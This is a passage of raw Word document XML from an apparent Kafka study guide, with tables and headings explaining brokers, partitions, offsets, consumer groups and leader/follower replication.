          </w:tcPr>
          <w:p w14:paraId="2989AB0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2172FAD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records from Kafka topics</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="1D0F82AE" w14:textId="77777777" w:rsidTr="00651890">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3572CE3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 Partition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="105EB9E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ical segment of a topic; consumers read from them</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="22669E4A" w14:textId="77777777" w:rsidTr="00651890">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77150EE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Offset</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7DEA590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index of a record in the partition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="5A1AEA0E" w14:textId="77777777" w:rsidTr="00651890">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55D345A3"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 Commit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2523665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ommits offset automatically</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="755D839A" w14:textId="77777777" w:rsidTr="00651890">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="559206FB"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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E22BA9A"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You commit offset after successful processing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="13B79CBE" w14:textId="77777777" w:rsidTr="00651890">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F8EAD1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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F935F30"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t of consumers working together for load sharing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0604D282" w14:textId="77777777" w:rsidR="00651890" w:rsidRPr="00CE4B95"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3352" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D64712" w14:textId="71B37731"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829" w:name="_Toc197868043"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is a Kafka Broker</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="829"/>
    </w:p>
    <w:p w14:paraId="5FB023F5" w14:textId="60BD27F7" w:rsidR="00E93F69" w:rsidRPr="008E5BA7" w:rsidRDefault="00E93F69"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core component of </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Apache Kafka</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, responsible for receiving, storing, and serving messages to consumers. It acts as a </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>message server</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the Kafka ecosystem.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03605615"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6156C3">
          <v:rect id="_x0000_i3353" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D32292"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Broker?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE204B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Kafka server</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DAE958"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ccepts messages</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>producers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3136B627"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tores messages</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> on disk (persistently)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF6C033"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erves messages</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w: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on request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073829B1"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Kafka broker can handle </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>thousands of reads and writes per second</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and support </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>many clients</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A4118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A3269">
          <v:rect id="_x0000_i3354" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0140C0DC"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20"/>
      </w:tblGrid>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="0DDEA35B" w14:textId="77777777" w:rsidTr="00E93F69">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C336B7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unction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4BAED99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3CAE6F85" w14:textId="77777777" w:rsidTr="00E93F69">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="312D90E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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C1CEC9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messages in topic partitions on disk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="0E905BA1" w14:textId="77777777" w:rsidTr="00E93F69">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0AF9206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erving</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="125CD62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livers data to consumers based on offset</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="5F11C47C" w14:textId="77777777" w:rsidTr="00E93F69">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5317F19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Management</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="589B762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intains data for assigned partitions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="75ED6E6D" w14:textId="77777777" w:rsidTr="00E93F69">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47ABB9F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Election</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="220A084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ts as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for some partitions and </w:t>
            </w:r>
            <w:r w:rsidRPr="008E5BA7">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>follower</w:t>
            </w:r>
            <w:r w:rsidRPr="008E5BA7">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> for others</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="3732F457" w14:textId="77777777" w:rsidTr="00E93F69">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="30B2407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4160BCA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data replication between brokers for fault-tolerance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="401B36EB" w14:textId="77777777" w:rsidTr="00E93F69">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38D48FF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tadata Handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4DA4A35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hares topic, partition, and offset info with producers/consumers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6F16A7F1"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7CA922">
          <v:rect id="_x0000_i3355" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5335A8D5"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C9ADCF4"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r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sends messages to a </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka Topic</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1B53DB"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receives the message and stores it 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6F6CE2E1"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assigned to one or more brokers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F48C85A"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broker</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> handles all reads and writes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663AECD9"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brokers</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> replicate the data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9D3DF5"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read messages from partitions using th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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145EED3F"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714B29">
          <v:rect id="_x0000_i3356" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C04C80"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24439056"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you have a </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3-node Kafka cluster</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F04F1CF"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broker may host one or mor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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBD5F61"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opics are split across brokers for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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B00C328"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broker 1 fails, Kafka reassigns leadership to ensure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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674BDB3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D6945">
          <v:rect id="_x0000_i3357" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="64253587"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664"/>
      </w:tblGrid>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="1199DB20" w14:textId="77777777" w:rsidTr="00E93F69">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02835B81"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Term</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="045A2714"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4C3E945C" w14:textId="77777777" w:rsidTr="00E93F69">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="56780F3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Broker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="56EC8F3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server that handles messages</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="78A73120" w14:textId="77777777" w:rsidTr="00E93F69">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17CE586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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6223209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nds messages to broker</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="2EBEC24D" w14:textId="77777777" w:rsidTr="00E93F69">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41148FC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4CDBFE7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messages from broker</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="46AD3054" w14:textId="77777777" w:rsidTr="00E93F69">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6730C2F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54B5348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Unit of parallelism in Kafka</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="1CDC7E24" w14:textId="77777777" w:rsidTr="00E93F69">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D23E81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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="658AE76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 of message in a partition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="4DA0B8D1" w14:textId="77777777" w:rsidTr="00E93F69">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51DFDA2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Follower</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13C026E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ader handles read/write; follower replicates data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="29DF0869" w14:textId="77777777" w:rsidR="00E93F69" w:rsidRPr="00CE4B95"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3358" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1E3957" w14:textId="7A4DB914"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830" w:name="_Toc197868044"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Define a Kafka broker and its role in managing topics, partitions, and message replication</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="830"/>
    </w:p>
    <w:p w14:paraId="5E727E1C" w14:textId="26061C97" w:rsidR="007F0DBD" w:rsidRPr="008E5BA7" w:rsidRDefault="007F0DBD"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server in a Kafka cluster that manages the storage and transmission of messages. It plays a crucial role in </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>managing topics</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message replication</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695CDBF9"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F0EA2F">
          <v:rect id="_x0000_i3359" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6FDD90"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Broker – Definition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2093ABB1"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message-processing server</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2E58A0"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cepts messages from </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>producers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790ADC3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tores them in </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
